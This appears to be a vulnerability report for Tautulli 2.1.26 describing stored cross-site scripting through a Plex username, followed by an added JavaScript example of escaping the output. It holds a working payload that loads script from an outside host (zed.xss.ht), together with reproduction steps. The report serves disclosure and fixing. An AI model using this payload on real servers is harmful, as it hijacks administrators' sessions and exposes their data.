Version:
2.1.26
What you did?
I changed my Plex username to geeknik"><script src=https://zed.xss.ht></script>.
What happened?
Tautulli does not filter out JavaScript when reading usernames, and when the admin visits the History page, the JavaScript is executed in the context of said admin.
Lines 112-128 are vulnerable:
https://github.com/Tautulli/Tautulli/blob/56a91de2c4ff0fdd8fbdff4dd7d7677bd16a4b28/data/interfaces/default/history.html#L112
Here we can see how it is reflected:
What you expected?
I didn't expect my friend's Plex server to leak a bunch of information at me.
How can we reproduce your issue?
Set up a Plex Media Server, install Tautulli, create a normal Plex user account to consume media. Change the user account name to something with JavaScript. Visit the Tautulli History page.
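As an added example (not part of the original report and not Tautulli's own code), the sketch below shows why a username concatenated into a history table cell is parsed as markup, and how encoding at the point of output keeps it as text. The row shape, the `user_id` and `friendly_name` field names, and all function names are assumptions for illustration.

```javascript
// Added example: hypothetical cell renderers, not code from Tautulli.
// Constructed sample row, using the username quoted in the report.
const row = {
  user_id: 42,
  friendly_name: 'geeknik"><script src=https://zed.xss.ht></script>',
};

// HTML-encode text for element content and for quoted attribute values.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Before: the username is concatenated as-is, so its "> closes the title
// attribute and the <a> tag, and what follows is parsed as new elements.
function renderUserCellUnsafe(r) {
  return '<a href="user?user_id=' + r.user_id + '" title="' + r.friendly_name + '">' +
    r.friendly_name + '</a>';
}

// After: every untrusted field is encoded where it is written into markup.
function renderUserCellSafe(r) {
  return '<a href="user?user_id=' + encodeURIComponent(r.user_id) +
    '" title="' + escapeHtml(r.friendly_name) + '">' +
    escapeHtml(r.friendly_name) + '</a>';
}

// Rough demo check: how many opening tags of a given name the markup contains.
function countTags(html, name) {
  const found = html.match(new RegExp('<' + name + '[\\s>]', 'gi'));
  return found ? found.length : 0;
}

console.log('unsafe <script> tags:', countTags(renderUserCellUnsafe(row), 'script'));
console.log('safe   <script> tags:', countTags(renderUserCellSafe(row), 'script'));
console.log(renderUserCellSafe(row));
```

Encoding belongs in the template or render callback that writes the cell, so every page that displays the username gets the same treatment regardless of how the name was stored.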